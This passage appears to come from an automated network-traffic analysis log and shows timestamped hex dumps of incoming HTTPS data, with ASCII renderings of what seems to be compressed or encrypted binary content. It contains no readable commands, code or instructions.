                                                                                                                2022-10-13 11:07:30 UTC1311INData Raw: a9 5d 35 17 f7 cc af 91 c6 a9 82 51 54 6d 40 a2 93 c0 8e ed da a7 bd b4 b9 87 78 59 50 a0 b3 38 88 55 6f e6 6f ae 74 ce 2d 36 4d 61 54 d9 68 74 40 4c 89 2c 1f ee 8f 1f 8f 45 c1 af d5 01 bb a1 f5 17 05 ad e5 c1 08 6c cd 82 62 05 54 41 a7 91 8f f2 d1 a2 4a 51 94 84 19 4b 22 a0 75 46 21 1c c2 69 5b b7 77 6a 67 4a a2 75 4f ba 97 f1 78 5a fc 19 11 9e 40 a4 76 82 db 82 a1 8a b5 f0 cd 2c c0 ac a2 b6 8f 31 8f 0f 84 ef 13 b4 ba 10 e9 58 a9 ee 19 1d 8c cf 49 cf ea 01 a7 29 bf 71 e2 64 8f a5 77 a3 a8 c2 de b2 e4 75 76 bb 50 b2 0b 8e 25 36 fa 51 7e 1d c9 56 c4 97 c4 82 2a b0 5a 31 9d e1 03 10 8c 31 3a d5 66 8e 17 42 18 b0 10 84 01 cc e9 07 a5 24 12 88 a0 89 88 e9 2c 76 58 db 78 cc 5b 4f 35 6f 9c 1f 62 cb d8 06 bb c5 98 73 0f e4 19 b7 ad 5b 60 96 b5 5e 21 bf fa 24 55
                                                                                                                Data Ascii: ]5QTm@xYP8Uoot-6MaTht@L,ElbTAJQK"uF!i[wjgJuOxZ@v,1XI)qdwuvP%6Q~V*Z11:fB$,vXx[O5obs[`^!$U
                                                                                                                2022-10-13 11:07:30 UTC1327INData Raw: d9 a0 b6 57 0b c3 fe 93 40 0b 1b f5 ee 80 f4 3f 53 37 4e 0b e4 0f c2 5f 0b 6f 64 86 52 0b 80 86 13 91 f4 7a b9 a9 bc f4 95 59 12 40 0b 54 35 ae 4f 0b 24 08 a2 b9 f4 ab 76 a0 a7 f4 09 10 85 b0 f4 a9 a3 f8 70 0b 35 a6 78 4c 0b 85 13 57 50 ea 09 d1 6f cd ed f5 4c 6e 29 bb ba f4 44 01 02 9d c4 5d d1 5c 4c 0b 47 82 93 10 eb 09 d1 6f 1a fb cb 0c 90 e8 01 81 b4 70 b3 9f 3c 1a f2 b7 95 17 8e 47 84 8f c2 84 2c ef 0c 26 6c 3c ff a3 73 05 b6 f3 5c 4c f2 ac e9 6d 63 e9 49 0c 7c a7 fb f2 31 a2 e3 c6 7c bf 4b 10 c3 ec a9 2f b3 b0 a0 63 bd 26 1a da 9f b7 0d 8e 4f 8c ad d8 84 0c cf 2e 3c 6c 94 57 81 69 05 5e 1b 7e 56 f2 c4 81 4f 79 e9 c9 8c 5e bd fb 9a 59 86 35 01 0c 45 3b 40 5b 42 06 7a 8e 83 fa 8e e4 b7 6c 65 e3 10 fa 5c ca c7 ef 20 90 b6 ee 4c d9 35 3c 54 3f da ad 2b
                                                                                                                Data Ascii: W@?S7N_odRzY@T5O$vp5xLWPoLn)D]\LGop<G,&l<s\LmcI|1|K/c&O.<lWi^~VOy^Y5E;@[Bzle\ L5<T?+
                                                                                                                2022-10-13 11:07:30 UTC1343INData Raw: 88 70 23 3e 5f 05 d2 09 85 cd 7e f5 c6 f9 0a 32 d6 b9 1c 73 f5 f3 74 f7 ed bb 52 3f 6e 0d 06 8c ad 42 2c de 83 dc 13 27 53 87 d4 4a 0b 52 80 88 74 5b f4 2b e0 6a 3c f2 d1 e9 5f 01 00 00 00 c7 40 76 23 48 64 74 cb 30 95 79 0b f2 6f 00 eb 73 f5 7f cc 15 f1 01 bf 01 12 a6 13 8c a8 f5 4d 7a 65 bc 3a 38 e2 5f 01 00 00 00 3b a9 7d 23 c5 1c 1b 32 63 eb af 60 f5 0a b9 92 34 50 50 1a 7c 0b 4b cc c6 e5 ed a1 d0 5a 60 23 56 cb a5 44 29 56 16 89 df 7f b0 de d8 50 3e 61 c7 c1 14 97 fd f7 29 6c 72 67 4f f5 19 c8 1b 12 89 e6 a4 63 f5 bb 17 1a 52 8d 35 3f 63 f5 81 b8 1e 92 e2 5a 44 67 f5 ce 09 80 b4 81 e6 24 62 8b c6 34 ed da 94 13 2a 0c eb 2d b2 54 45 9d 0d 3f 2f 22 3a 70 d0 a3 68 c9 46 83 c3 0e 08 2a 90 dc 99 ba 4f 58 e8 ae 3a 6b 47 b8 fb 29 43 a7 0d 2f 04 6b 05 b1 d4
                                                                                                                Data Ascii: p#>_~2stR?nB,'SJRt[+j<_@v#Hdt0yosMze:8_;}#2c`4PP|KZ`#VD)VP>a)lrgOcR5?cZDg$b4*-TE?/":phF*OX:kG)C/k
                                                                                                                2022-10-13 11:07:30 UTC1359INData Raw: d1 ab c5 cf c7 2e 9f 27 73 ec 2e de d2 4b 19 d1 bf 03 83 d5 2e 34 76 05 2a d1 12 22 17 d9 2e 73 d1 b2 d0 2e b5 6b 11 2c d1 f5 f7 e5 eb 2e 26 91 b9 14 fe ff ff 0f b9 54 0a 1a fd 87 2c 3f d1 d6 44 29 8e 49 0e f9 c2 85 9a d6 89 56 80 ce 2c 14 0a d0 a2 51 2d 51 f2 2e 86 35 c7 3f ec 2c 53 d2 2e ea f1 4b eb fe ff ff 0f 68 24 98 bd 19 7b c3 3f 22 30 06 f2 2e bb 15 8d ac 35 23 f3 13 43 7d fb cc 2e 08 8e 4a eb fe df 82 3d 0e f7 11 09 56 3f 59 0b fc 81 13 79 e1 6f da 7c c7 57 cb 68 09 cb 79 c5 7a 13 ec 07 d7 74 33 b1 40 a3 3e 90 c7 e9 08 42 c1 1a e7 74 02 dd c5 9b 76 ee e4 91 5b e9 c6 03 02 74 a1 e2 15 3b 13 fc d7 29 1b f9 6f 92 be a5 4f cb d6 db a9 61 c5 ac f1 8e 1f d7 80 b9 d3 58 a3 b0 ea b5 9c 2d 11 39 2c d0 f5 65 3c 2d d1 3a c0 ba d2 2e a8 fc a8 21 d1 b5 3f 0d
                                                                                                                Data Ascii: .'s.K.4v*".s.k,.&T,?D)IV,Q-Q.5?,S.Kh${?"0.5#C}.J=V?Yyo|Whyzt3@>Btv[t;)oOaX-9,e<-:.!?
                                                                                                                2022-10-13 11:07:30 UTC1375INData Raw: a1 f0 45 a0 55 ae a3 13 0f 2a 9d d2 62 56 aa bc aa 7c 82 d5 98 ba 78 02 2a d4 91 95 68 c3 d5 71 a4 70 48 39 1f ff 99 62 e8 06 dd 8d 43 5d 57 42 e5 31 4b ea 86 b2 7f 4f 3f 85 39 c2 e9 c7 17 92 93 4b 82 ed 54 77 0c 29 52 0f 1e 23 92 92 c1 ef 7c 3a e8 e0 47 31 68 a4 0a c5 25 12 e8 99 c6 bc 0b ca 8d 9f 51 5a 55 e5 b4 df e7 91 b2 bb eb 32 92 39 ef d5 ca 00 92 56 7f 8f fa 54 ca e0 24 45 0f ca c3 3b 6b 0d 33 2d ce 33 1c c6 80 56 f4 fe ff ff ff 5c c8 d0 3b b0 4f 3c dd bb 98 0e 4b 42 cd 99 43 aa bf 32 90 19 91 d9 bb f4 a9 7b de 3b cb 8b 1c 4e 4d af dd 63 b2 b2 e7 2b 13 43 4d 33 52 61 24 c4 f4 80 5a 25 44 2a ad 3e b3 b2 4c 6b b9 dc bb fc ca ce 43 cd ad 8f 2f be 32 4c 4d 14 d8 bb a0 cd fe df 3b bf 77 99 4f 4d 63 79 e6 b3 b2 73 02 31 be 2a 2b de df d9 01 63 ab 63 1f
                                                                                                                Data Ascii: EU*bV|x*hqpH9bC]WB1KO?9KTw)R#|:G1h%QZU29VT$E;k3-3V\;O<KBC2{;NMc+CM3Ra$Z%D*>LkC/2LM;wOMcys1*+cc
                                                                                                                2022-10-13 11:07:30 UTC1391INData Raw: 18 c4 12 b1 5f 0b ff ff ff ff 52 27 25 84 ac 9e 45 2a d0 f2 6b e2 23 3a 56 2e 5f 00 00 00 00 d7 b2 0f 97 7c aa f9 ec 44 08 6c 15 c7 79 27 a4 0d b8 f2 9a 8c 1f 05 c5 96 50 4f 8d bb dd d3 e7 36 88 b7 82 a1 8c 83 07 5b 4b 8d 57 a8 7a e6 36 c2 ab 57 4a ee bc aa 3c 4a 90 48 e5 2d 04 c7 a8 38 c2 c8 85 36 41 4d b4 1d 39 65 25 04 66 39 2c ce c8 b4 70 eb d4 96 48 71 6d 9b fa dd fb 7c 4d c8 c6 f7 e5 3e 89 3e 56 1f 5d 4f af 7d a8 9f 46 df fb ff 60 14 1f 24 86 93 a6 f4 fe ff ff ff a7 16 42 cd b4 cd b3 25 c4 6b 1f 88 24 44 a5 fa ec b2 b2 0b f4 6b dd bb 13 bd 1c 42 cd da 58 fd bf 32 bb 2a c6 d9 bb c7 ba 2c de 3b d8 28 4b 4e 4d 3c 26 34 b2 b2 2c a8 44 43 4d b0 e1 36 24 c4 57 cb 0d 25 44 81 b6 69 b3 b2 37 80 ee dc bb 77 11 99 43 cd 46 7c 78 be 32 bf 3e 43 d8 bb 23 8f f3
                                                                                                                Data Ascii: _R'%E*k#:V._|Dly'PO6[KWz6WJ<JH-86AM9e%f9,pHqm|M>>V]O}F`$B%k$DkBX2*,;(KNM<&4,DCM6$W%Di7wCF|x2>C#
                                                                                                                2022-10-13 11:07:30 UTC1407INData Raw: 82 42 9a 8a 81 32 0c 67 16 a2 0e c0 33 34 44 34 53 81 fd cd 65 c6 4c 7c 10 d2 65 1e 8d ed ba a7 f3 2b ef a0 0d c9 6d 0a d6 38 93 f2 49 ff 36 f3 4a 38 57 7d 78 c8 11 34 d2 68 fd d2 22 89 48 93 15 f7 4a b4 55 19 5d 18 1e 61 a9 f9 b9 3b 6d e2 42 8d 71 b9 87 01 6d e3 d2 38 e8 1a 2d d5 86 6a 6f cd d2 36 61 aa 1b 18 8c 8c 65 25 c6 a6 87 65 b8 cf 76 11 a2 35 2a 05 d1 04 3c 89 c6 6b 71 ab 82 67 47 64 f4 8e c9 af a9 67 57 fd 64 2c f4 cb 3f fc 89 ad 16 64 46 6b 33 61 e4 6b eb b4 4b 4f 69 01 1f 66 01 3d d9 b8 5b 73 55 0b 3b c3 40 42 4d 7a 5c ed a7 ff b4 50 98 b7 00 5e 0c 91 a1 d2 96 82 cc f2 f0 00 a9 10 b4 90 ca a0 f6 96 f6 c6 b6 a0 e9 ff 2d 69 1e 5f 8e 9b aa 9e b2 ec 93 b8 a0 75 2d f7 b5 26 93 03 4d 17 b1 9a 75 76 fd 6e 7a 45 c9 ed 56 ad 5f db 7f e4 75 6d e5 57 25
                                                                                                                Data Ascii: B2g34D4SeL|e+m8I6J8W}x4h"HJU]a;mBqm8-jo6ae%ev5*<kqgGdgWd,?dFk3akKOif=[sU;@BMz\P^-i_u-&MuvnzEV_umW%
                                                                                                                2022-10-13 11:07:30 UTC1423INData Raw: d8 e1 fc 29 d6 64 ec 28 ba 51 8b c9 5f d8 40 5d 15 83 da 35 55 6b 68 2b a0 31 9f 53 5e 52 68 16 f5 8b bf 68 04 13 0d 9a d7 55 2f f7 1c 8c 2c 57 c2 4a dc 79 8b c0 65 f3 98 81 30 fe da 21 a6 29 65 fa ce 19 fb f8 c8 87 b1 85 71 2f bb 72 5c f0 06 d4 67 cd 89 5c b6 44 70 14 d0 71 76 e5 77 06 c5 18 ea ba 4f 4f 35 41 04 f8 15 de 2a d3 8d 56 aa fb cb a9 dc a7 0d 99 8e 5a ef e7 67 7d 10 53 7d 8d 80 14 f8 11 e8 aa eb 78 11 f2 72 6e 3e eb ae 4e 7f c6 94 70 ec 02 ac 17 f2 63 e2 ee d0 86 0f 9a 42 f2 c8 d0 43 f6 2a a4 d0 0d 49 22 f1 5e 30 1d 75 cf 86 d1 ab 47 5e af c9 2d fb f2 bc 03 ec 5a 74 5a 62 72 14 8c 3f a3 0b 25 b7 d4 6a 00 77 0a e6 40 7c d9 78 26 dd 9f a7 55 4e ec 4d b1 7b d9 38 d6 8c 58 fa 42 29 f6 c3 9c 38 17 29 72 21 9d 25 1c b4 8f 26 6e c6 b9 ea 86 2a fb e6
                                                                                                                Data Ascii: )d(Q_@]5Ukh+1S^RhhU/,WJye0!)eq/r\g\DpqvwOO5A*VZg}S}xrn>NpcBC*I"^0uG^-ZtZbr?%jw@|x&UNM{8XB)8)r!%&n*
                                                                                                                2022-10-13 11:07:30 UTC1439INData Raw: 3e e7 0b 47 2a 04 e6 43 58 21 af 84 9c de 51 7d 6a 7b 5a 35 51 2e e8 c9 7b 7f cc 39 fb 6e 1a 50 d2 ad a9 02 a1 b5 35 a5 df 39 10 32 a6 6b a5 02 7c a3 4e e9 60 3a ad ec 83 f8 bb c5 9b 3e 48 14 55 02 27 71 2c 6c 2d 0e b6 73 7e 4f db 8d 40 86 86 5b 3e a8 21 e9 64 13 af f7 eb 12 86 0b d1 f4 2a c5 e0 25 fb e6 b4 43 a4 a2 b5 e7 59 2a 16 59 9f 05 e0 6d d5 dd ef 19 fd 7b 16 c7 a0 92 bb 17 c7 0b c9 8d bd f0 da 76 e3 38 6f 87 30 97 c3 66 23 11 85 49 5a ad c0 03 5f 03 ca 13 49 80 6c ed e2 f6 d0 2d c4 39 23 a9 f3 c9 c2 77 17 fc ee 29 65 12 98 18 9f b3 be 95 93 88 49 75 1d 31 02 aa d4 9c 10 18 0e 8b 27 2f 7e 52 e9 00 00 7c 48 10 44 e4 04 b0 c7 0b f7 73 1e 71 05 0f 07 b2 08 5b 62 12 15 a4 4e 9b 18 25 1c ff 9e e6 e4 f1 82 62 47 eb 0b d8 41 83 d3 de 2b 6f f4 2e 36 6a 25
                                                                                                                Data Ascii: >G*CX!Q}j{Z5Q.{9nP592k|N`:>HU'q,l-s~O@[>!d*%CY*Ym{v8o0f#IZ_Il-9#w)eIu1'/~R|HDsq[bN%bGA+o.6j%
                                                                                                                2022-10-13 11:07:30 UTC1455INData Raw: 7a 4b 24 2a f2 25 d5 8d d9 53 36 2b 59 56 d2 9e 3d de 1c ff 3d 2a 27 2d d4 11 50 9c a7 dd 4b 85 d6 5a 81 44 73 56 7a fe 1b 7f 66 64 3b 45 93 f4 fe d9 46 7e c6 ef 1e 74 88 f8 0e fb f5 8d e1 fa b5 13 e7 60 c2 a7 f5 65 0b 69 5d 24 d5 a7 53 51 96 ca 79 38 84 58 fb 71 50 43 53 b9 76 df 3f 8b 34 10 78 a3 7d c0 d2 4f 1a d8 51 91 7b 96 06 14 9c 87 53 08 06 a2 39 aa b9 41 b4 6f 94 ba 42 70 79 b7 8b 50 0c fe 85 94 40 87 dc bc 50 89 00 04 87 82 62 c3 5c 67 f5 9c 23 5f 5d 9f 60 1f 39 4e 42 3e 7a fa 80 35 59 9f 1f 35 8b 55 07 41 c9 56 d0 ab 9f 59 71 ed b8 1b 86 b5 d6 bd 5f 53 52 ec 63 2f 5a 65 b3 e0 c2 74 19 f9 2a 15 c2 ff 23 72 3d d0 40 29 17 b4 00 86 51 2f 16 22 40 a7 6e d9 91 a2 f1 e6 81 2d 7d 01 62 8e cc dc d4 24 84 30 fd e9 89 93 12 7a 04 01 e1 d7 d6 51 0c 29 69
                                                                                                                Data Ascii: zK$*%S6+YV==*'-PKZDsVzfd;EF~t`ei]$SQy8XqPCSv?4x}OQ{S9AoBpyP@Pb\g#_]`9NB>z5Y5UAVYq_SRc/Zet*#r=@)Q/"@n-}b$0zQ)i
                                                                                                                2022-10-13 11:07:30 UTC1471INData Raw: 5a c3 10 5d 63 93 3f 9a 3f 9c 4d 41 f4 3d ba 3c 0f f8 30 7b 6a 4e f5 61 b9 14 1e a6 9a 37 d7 bd 73 31 f9 fa 46 a2 ac 56 bb 16 b1 e8 7e 64 4c a7 54 c3 70 ca b9 f6 c1 8d 93 54 42 38 99 5a 47 0b 41 dd 92 14 00 4b 9d 18 14 cc 46 54 97 7d ff cb dd 7d 5d 44 6a 92 c8 de 4c 8c 25 74 ee 52 71 d2 a0 d7 00 93 bc fd a0 f8 8c a5 07 7b 7c 24 f5 b2 a7 39 88 5d a8 0f cf 5f 7b a2 11 7e 6d 91 88 40 75 20 32 a9 86 7f d8 22 03 6d d9 4c 42 e9 e4 e0 b8 0c cb 61 25 3c cb 19 36 1f d7 b9 7b bd 2b 41 ec 8c 63 91 ac 06 f9 fd cd 21 a6 b2 57 17 1c ce 2b 05 c5 42 4a 92 dd 4a 45 a2 81 0f 13 c8 05 72 a4 38 64 af eb ea 8c b0 4c b4 d0 01 69 04 aa 89 d8 b3 17 e7 ca 43 a6 76 d5 18 f9 f8 8f 2b 05 e0 de cd 13 cc 97 3c 12 ea 50 ee 70 a5 6f 73 ae c1 00 68 aa 01 9f 05 0a 8a 9d d0 0e 9f 7a c5 65
                                                                                                                Data Ascii: Z]c??MA=<0{jNa7s1FV~dLTpTB8ZGAKFT}}]DjL%tRq{|$9]_{~m@u 2"mLBa%<6{+Ac!W+BJJEr8dLiCv+<Pposhze
                                                                                                                2022-10-13 11:07:30 UTC1487INData Raw: fd 27 52 41 ee 17 fb 97 fb b1 2f 31 5e 90 07 19 e6 5b 5e d4 4e 6a ae 37 1f 8d de e2 8c a5 9a d1 42 58 ce 8c 5e ff 77 bb c0 f3 04 46 0e e2 7f 4e fe b8 24 b9 3e e3 bc 75 1a 7f 53 39 e4 97 03 32 2f 9e ea ab 4a 3d 81 a5 5d ca 89 e1 07 9b c8 7b 4d 11 34 d4 77 7c 98 2b 79 11 d7 8e 11 59 12 f0 aa fe 16 59 e0 8f 1b 23 2d a3 83 98 45 dd 57 52 ff 94 b1 46 50 42 20 74 76 8a 7e 45 cb 3b 61 56 b6 c0 5b 68 33 ad 86 b1 0c dd 1d c8 38 8f 6c 99 c8 72 86 fe 54 28 4e 3f 4a 9a 54 69 64 ed a0 e6 d3 97 46 58 be 1c 4e 4f 06 ef d2 f3 42 f7 6d a1 99 ca 55 c3 5f 17 31 13 57 18 26 b6 30 37 8b ce 7c 0e bb f1 10 22 f4 8c 06 10 49 b3 8f 65 34 bf 98 22 b7 86 fa 58 07 f0 b8 69 c0 e3 92 0f cd 58 37 6a 93 6f 58 03 ee d8 be fc 59 52 46 47 03 06 66 ff 7c 8c 8d e2 ab 4a 5e c0 70 d3 c0 52 a3
                                                                                                                Data Ascii: 'RA/1^[^Nj7BX^wFN$>uS92/J=]{M4w|+yYY#-EWRFPB tv~E;aV[h38lrT(N?JTidFXNOBmU_1W&07|"Ie4"XiX7joXYRFGf|J^pR
                                                                                                                2022-10-13 11:07:30 UTC1503INData Raw: 9d fc 37 08 28 6d 37 7c a4 ca 8e 85 93 ec 75 2e 5d 2a f0 f1 c8 7d a0 44 39 ba fa 33 18 35 4b f2 03 24 b5 01 0a c3 de b6 85 9f 52 79 20 ea cc 44 6a 28 35 0c 7a 59 31 8c 5b e7 5d cd fa 82 81 c6 5e b4 a5 d4 93 5b 78 14 16 55 93 01 b9 96 64 74 57 f0 fc 67 73 b5 56 d9 66 9e f5 a5 2a 2f 4b 1a b4 37 e2 02 d4 ae ee 9b dc b2 44 67 78 46 72 81 67 80 60 4c 54 91 06 28 43 d1 1e c3 14 9d 74 45 67 66 75 f5 cd 73 0c bd 6f 98 1c 1b 4a db e1 91 ab ff 70 87 ef 0c 0e 25 fc 1a 22 26 a5 c3 65 65 63 cc f7 ff 58 fa 2a a8 de e8 d9 04 79 f0 bf cc 31 8c 66 5d 9f 2c 80 63 c3 7a 84 57 0d 87 bf 3b 3d 1b eb 92 31 f4 fe d8 74 c8 89 cf 2d 69 8f 5a ca 74 ef ea fb 21 2c d1 d8 0c 15 7a ee bc c4 3b 8d f8 f4 76 95 8e d3 da 31 92 8f 04 e2 de 6f ee 78 83 6b 03 b2 7c 6d e1 67 95 ce 64 b3 66 c8
                                                                                                                Data Ascii: 7(m7|u.]*}D935K$Ry Dj(5zY1[]^[xUdtWgsVf*/K7DgxFrg`LT(CtEgfusoJp%"&eecX*y1f],czW;=1t-iZt!,z;v1oxk|mgdf
                                                                                                                2022-10-13 11:07:30 UTC1519INData Raw: a6 c0 12 de 0b 25 ed cc ba ef a2 2e c0 56 7a a2 c4 71 a1 e9 e5 54 0e 7f 8c 97 8a 45 ea bf 85 73 be 20 8d 5e 56 3a 59 f0 63 c2 83 f3 0b b2 4c bb 5d 0c e6 40 4c 11 90 8c f3 c0 9b e3 bb fc a2 8d a8 d4 2a 33 43 f2 f5 d9 aa c0 2a a2 08 20 65 a2 b5 e9 83 fa d5 42 4a 07 4e 0c 60 12 75 10 01 ae a9 00 d1 6e 7b 08 77 ab 4c 37 53 10 c2 93 69 3a 7f 88 10 2d d3 04 f7 28 23 27 4a 4b 5d eb b9 29 05 57 8b d8 29 cc f2 e4 51 f9 ac 6f e8 cb 65 86 c4 6a de b4 ec f0 2b a8 46 11 e0 8b 7b 20 1e d4 0a 9d 6b 3a f8 99 9b c0 16 51 65 25 39 ad c6 e1 17 ce 64 e3 34 94 71 e3 35 37 f3 2a e8 57 f3 e7 33 42 66 0a bc 47 70 53 8a 14 e4 80 aa e0 0c 62 f8 75 dd 45 fd 4b c6 c8 99 b5 05 53 5d 2f 0b d7 a4 d3 fd 60 f8 9b de 26 af 98 cf 2b b9 28 ab fd 98 10 4f 65 d4 04 cb 91 92 80 e0 bc 53 32 45
                                                                                                                Data Ascii: %.VzqTEs ^V:YcL]@L*3C* eBJN`un{wL7Si:-(#'JK])W)Qoej+F{ k:Qe%9d4q57*W3BfGpSbuEKS]/`&+(OeS2E
                                                                                                                2022-10-13 11:07:30 UTC1535INData Raw: 16 20 23 02 6b 11 10 31 9a c8 9a 1f e9 58 33 1c 9e c5 64 f4 58 e8 d2 86 1a da 9d 4e 81 88 13 b5 d8 7e c1 a9 96 f7 1d b6 1d c4 9b 2d e2 76 a9 e0 3b 16 a7 73 b1 02 b1 ad ae a4 b4 4e 6b fc a5 6d 63 5a e0 c1 b9 a2 15 dc 60 87 3c 53 2b 58 dc f1 31 4e 02 3c 61 08 45 b0 e9 60 24 16 ce ba f4 df 95 85 00 e8 51 b9 56 9f 6d 73 d6 4d 50 0d fb a8 dc a7 9c 20 e2 42 21 96 d4 7e a2 92 44 e7 e3 75 b2 bf e7 be 6d 22 6d 0d 0f eb 0c bf 59 77 f2 a1 c1 90 9e 8e 4d af 52 c1 6b 8b 55 05 a3 26 83 a1 05 77 db 36 85 95 39 dc b5 fa 9d 07 c1 5a 02 cc 4f 04 04 38 2c 86 49 f7 d2 a4 a0 de 55 3d 74 e2 9b 65 d9 66 ba c4 46 f2 9a 76 51 94 47 a1 7c 3b fe 95 e3 a0 32 eb 1f 17 9b 63 28 e8 a3 bf 56 1b 33 d7 cc 2b 91 94 f6 ab 57 32 f5 e9 ae 90 a4 7f b5 71 e4 19 dd 63 e1 dd 8c a6 35 86 7d c9 f7
                                                                                                                Data Ascii: #k1X3dXN~-v;sNkmcZ`<S+X1N<aE`$QVmsMP B!~Dum"mYwMRkU&w69ZO8,IU=tefFvQG|;2c(V3+W2qc5}
                                                                                                                2022-10-13 11:07:30 UTC1551INData Raw: e7 4d ab 80 6b 0e 04 db 49 6e 46 93 d0 24 e3 7c ac e2 22 6b d0 64 35 13 56 41 24 8e ba e2 87 ac 1c c0 19 71 10 c7 6a 8a 8e 4a 4c 13 29 b0 8d 75 66 37 4b be 74 2c 9b 33 ba 4f 14 8f d5 30 8b 90 99 22 ef 6d 95 a1 df f8 87 ab bf a6 2c 4a 0b 0d 98 75 41 f2 0f 76 86 e0 de 46 9e c1 03 50 7c b5 36 35 05 23 e3 d3 9e 05 25 4b b1 46 4f a9 81 4d 37 d9 7d 14 e1 25 5a 13 b8 83 f7 6c 4b e9 20 52 f6 9b 14 76 6a 78 88 8d 7f 47 3f da 80 d3 1c 53 f8 f1 dc 0a 0a 90 4d 54 62 36 eb 42 dc 55 11 6b f6 81 65 54 6f dd f3 82 a4 5b 45 9f 66 a9 b4 68 40 f8 77 06 0f d7 8c 5d 00 0f 00 63 4e 87 8c d7 a6 66 c1 d7 d4 f6 52 ce bb b4 53 55 ea 7f fb 34 20 3e 63 ef b8 e8 be 01 f9 02 22 63 97 bd 2b 57 68 15 53 1c 4c fa 17 b8 fc 82 e7 c0 13 39 2f 7d 9f 4e e3 a0 68 79 c5 30 5f d8 52 15 77 e6 b7
                                                                                                                Data Ascii: MkInF$|"kd5VA$qjJL)uf7Kt,3O0"m,JuAvFP|65#%KFOM7}%ZlK RvjxG?SMTb6BUkeTo[Efh@w]cNfRSU4 >c"c+WhSL9/}Nhy0_Rw
                                                                                                                2022-10-13 11:07:30 UTC1567INData Raw: b6 76 be 17 6e 56 7e 71 94 ae c5 19 d3 c6 41 68 7d 99 71 ea d9 57 f7 87 ba c5 44 18 be 48 30 da 9c c8 e7 04 83 93 e6 ab 90 e5 d6 f6 33 49 86 79 3f b6 53 a2 35 f8 5f 4e 97 d3 f3 5d 8a f1 0d 11 11 1e a0 f1 8e 9f 41 ab cf 08 0a 9b 7e de 5a 02 e1 46 9d bb a8 37 2d f7 75 fa c0 81 0f 61 6e 16 ab dd 20 4c 08 0a 81 00 e1 55 e8 20 78 41 38 2a ed 45 15 78 c3 fa 6f 7d 79 ad 3f 2b 20 d5 87 f3 4f be 40 7f 14 5f c3 bd b5 49 f5 4e ec 8d 2f 3a 3f ca 7e 80 75 cb b5 f3 19 2e 3b ca a4 a9 64 a5 68 4e 9a 7d ef 80 45 6c 7b 70 bd 9e d4 7d e0 e7 9c 87 db c7 33 1b b4 45 44 9b 2d 18 30 9d 04 cc b4 91 33 02 1a 4a 05 98 fd 0b 17 a6 7e 01 a9 2f 75 3d 79 db 7d ab bf 8b e8 64 d4 46 31 ac 02 cb d1 c0 65 a8 53 a8 e8 3a d3 1a f6 64 e1 19 a0 9e 9b 0d 28 00 75 89 e2 1b ba e8 9f ea a1 ac cf
                                                                                                                Data Ascii: vnV~qAh}qWDH03Iy?S5_N]A~ZF7-uan LU xA8*Exo}y?+ O@_IN/:?~u.;dhN}El{p}3ED-03J~/u=y}dF1eS:d(u
                                                                                                                2022-10-13 11:07:30 UTC1583INData Raw: 64 c1 ec 82 d1 0d cb 7d a3 8b 87 30 b8 15 80 1e 1f 8a 7e be a1 47 65 ea 8c 93 1a d3 32 81 1b 8b d3 45 b0 62 42 b5 3c fd b4 19 af ac 88 12 9d 64 57 27 20 44 c4 de d2 e5 f7 bd fe be 98 95 ba 51 17 78 f6 41 16 bf 80 71 8d 98 5f 73 04 bb 48 32 b8 d2 c8 24 c7 c7 6f ff 8d 03 48 7d 09 7f de a5 66 31 14 f9 b8 c4 63 9f 60 35 49 16 61 b4 65 1c 09 80 de 56 59 95 36 18 b4 c4 b2 83 4e c6 8f 1b 33 04 c3 5b d3 67 a3 2b b8 42 1b b7 00 6e b4 40 0f 5f 78 2d 66 95 26 a0 ff a7 51 18 18 2a d3 c6 2f c5 fc c2 de b4 8a 65 db d6 fb d7 03 64 b6 17 dd 8a d0 1e 3b a4 35 6d f5 8d ae 72 ab 58 d8 7c 15 88 29 f7 c1 9d 1a 07 b9 be f5 48 e2 10 7c a0 74 9f 0a f5 6e 7c 00 20 02 67 cf 25 87 47 35 cf 0c 85 62 f9 6b 4b c9 2f e8 88 a8 42 07 04 e6 85 59 f2 df ca 8d 36 59 42 6c 81 ea 26 9e 8c 61
                                                                                                                Data Ascii: d}0~Ge2EbB<dW' DQxAq_sH2$oH}f1c`5IaeVY6N3[g+Bn@_x-f&Q*/ed;5mrX|)H|tn| g%G5bkK/BY6YBl&a
                                                                                                                2022-10-13 11:07:30 UTC1599INData Raw: 1f f9 80 1b d7 d7 4f 89 1e 35 b3 b5 e0 e1 92 8f 96 c0 fe 07 ba 15 12 46 33 c8 bd 43 bf ea b9 38 93 77 64 6b 42 ac 99 7f 0a 20 4f f6 26 5b e5 05 cb f3 02 24 85 ef 55 c8 11 59 d9 e4 f0 22 7e bf 89 b5 2f 63 40 d2 0d d1 dc 81 ac 0c 3c 9b ce 7a d3 e5 d9 c9 d7 83 3f 4a 3c 99 91 32 68 7e 04 7f 77 a5 7f 3c f5 36 a3 a1 1a ef 39 26 a2 d5 70 bb 9b 3e 77 74 87 68 57 7e ad a4 5e bd 14 c0 3a 5e a7 9e 41 15 10 53 e3 ab 3a 59 cc 6f 72 0e 00 c8 07 67 9c bf f1 b3 fa 53 e1 21 40 8e ab 95 9c d9 ec 2b e0 76 06 72 78 f1 ca fd c7 67 a9 51 81 3e 0f cf 9d 48 04 18 53 d7 05 23 77 d7 5a 38 c1 a5 39 8e 2b 3a 73 f2 2e 4e 9e ba f6 90 c7 15 f3 23 87 ea ed 63 21 d5 2f ba 5e ff 34 43 42 59 30 00 18 5f 11 7d 59 a2 b8 b1 82 21 e5 58 bd 3f 8a c0 fe f0 39 22 00 75 05 01 ac 78 9d dc 1c 40 b4
                                                                                                                Data Ascii: O5F3C8wdkB O&[$UY"~/c@<z?J<2h~w<69&p>wthW~^:^AS:YorgS!@+vrxgQ>HS#wZ89+:s.N#c!/^4CBY0_}Y!X?9"ux@
                                                                                                                2022-10-13 11:07:30 UTC1615INData Raw: 86 9f 86 7d 9a c1 9f c1 a7 fe 5f 24 35 ab a2 d2 8e e1 47 cb 4d 05 f2 d7 ff 01 9b fb 5d 21 e8 11 09 53 37 e6 bf f2 70 d1 98 86 2e f0 0c 6a 9f a9 86 79 3a 3f d2 5a e2 e7 db 13 45 a6 61 b0 78 61 43 7c 21 0c af 48 d6 4d ae 74 0f 1e 6d 38 f0 eb 46 d6 ec 8e ed b9 61 e1 74 66 05 6f ff 81 b9 28 1b 62 72 c4 87 55 35 0e 2f f7 22 1c aa 88 db 7c 70 ce f3 ea 77 6c 43 6e 1a 4a 3b 52 11 ca 2e 27 b8 6d 36 8a 33 96 55 6b ef d7 b2 36 c6 13 6e 04 50 e9 e7 30 cd 82 da e4 76 20 18 68 14 30 33 04 dc 5a 8a 2b da c5 92 20 e3 3e 4f bb 18 8f fb d6 2c d3 8b 38 dc f0 16 87 d5 8a 83 